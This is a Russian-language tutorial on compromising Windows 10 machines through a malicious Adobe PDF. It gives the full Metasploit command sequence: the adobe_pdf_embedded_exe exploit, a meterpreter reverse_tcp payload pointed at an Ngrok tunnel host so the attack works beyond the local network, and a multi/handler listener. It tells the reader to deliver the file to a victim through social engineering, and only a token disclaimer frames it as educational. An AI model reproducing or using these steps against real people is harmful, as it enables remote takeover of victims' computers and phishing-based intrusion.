Взлом ОС Windows с помощью Adobe PDF
Вступить в наш чат
В этой статье мы узнаем, как хакеры взламывают Windows 10 с помощью эксплойта Adobe PDF. Мы будем использовать инструмент Ngrok для переадресации портов, который доступен для Linux, Windows и macOS. Ngrok помогает осуществить взлом через Интернет и атаковать за пределами локальной сети.
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Взлом Windows с помощью Adobe PDF
Требования:
- Установленный Kali Linux и Ngrok;
- Цель должна иметь Adobe Reader версии 8 или 9.
Этапы взлома Windows:
1. Создание вредоносного PDF-файла с помощью Metasploit;
2. Переадресация портов с помощью Ngrok, чтобы взлом работал через Интернет;
3. Запуск прослушивателя для вредоносной полезной нагрузки с помощью Msfconsole.
1. Создание вредоносной полезной нагрузки с использованием Metasploit Framework
Шаг 1: Откройте терминал Kali Linux и введите следующую команду, чтобы запустить Metasploit:
msfconsole
Шаг 2: Существует множество эксплойтов Windows. В этом мануале мы будем использовать эксплойт Adobe pdf. Вы же можете выбрать любой другой эксплойт.
Введите следующую команду, чтобы использовать эксплойт Adobe PDF:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Шаг 3: Теперь, когда мы выбрали эксплойт, нам нужно указать полезную нагрузку для внедрения во вредоносный файл Adobe PDF. Для этого введите следующую команду:
set payload windows/meterpreter/reverse_tcp
2. Переадресация портов с помощью Ngrok
Шаг 4: Теперь нам нужно запустить службу Ngrok, чтобы мы могли использовать переадресацию портов на нашей машине. Чтобы запустить службу ngrok, введите следующую команду:
./ngrok tcp 1234
Шаг 5: После того, как вы запустили службу Ngrok, вы увидите следующее:
Адрес перед двоеточием (
— это ваш LHOST, а после двоеточия — LPORT: см. изображение ниже:
Примечание: ваши LHOST и LPORT будут отличаться от тех, что видите на скриншоте. Замените их на LHOST и LPORT.
Если вы хотите использовать взлом в локальной сети, то замените LHOST и LPORT на свой собственный локальный IP-адрес. Вы можете узнать его с помощью команды ifconfig.
Шаг 6: Теперь, чтобы настроить LHOST, введите следующую команду:
set LHOST 0.tcp.ngrok.io
Шаг 7: Чтобы настроить LPORT, введите следующую команду:
set LPORT 13288
Шаг 8: Установите имя файла:
set FILENAME test.pdf
Шаг 9:Введите следующее, чтобы запустить эксплойт и создать вредоносный pdf-файл:
exploit
Таким образом, Metasploit создал файл Adobe PDF с именем test.pdf. Metasploit по умолчанию поместит файл в /root/.msf4/local/test.pdf. Проверьте этот каталог на наличие вредоносного PDF-файла. После чего вам нужно будет отправить этот PDF-файл жертве, используя приемы социальной инженерии.
3. Создание прослушивателя для вредоносной полезной нагрузки PDF
Чтобы создать прослушиватель для нашего вредоносного эксплойта Adobe pdf, нам нужно ввести следующие команды по порядку:
Шаг 1: Откройте Metasploit в новом терминале Kali Linux:
msfconsole
Шаг 2: Выполните следующие команды в том же порядке, как показано ниже:
use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 127.0.0.1 set LPORT 1234 exploit Итак, как только жертва откроет вредоносный PDF-файл, будет установлено соединение Meterpreter через прослушиватель Metasploit. Далее вы сможете выполнять все остальные действия. Просто введите help, чтобы увидеть список всех возможных взломов.
Поздравляем, вы успешно взломали Windows с помощью вредоносного pdf-файла.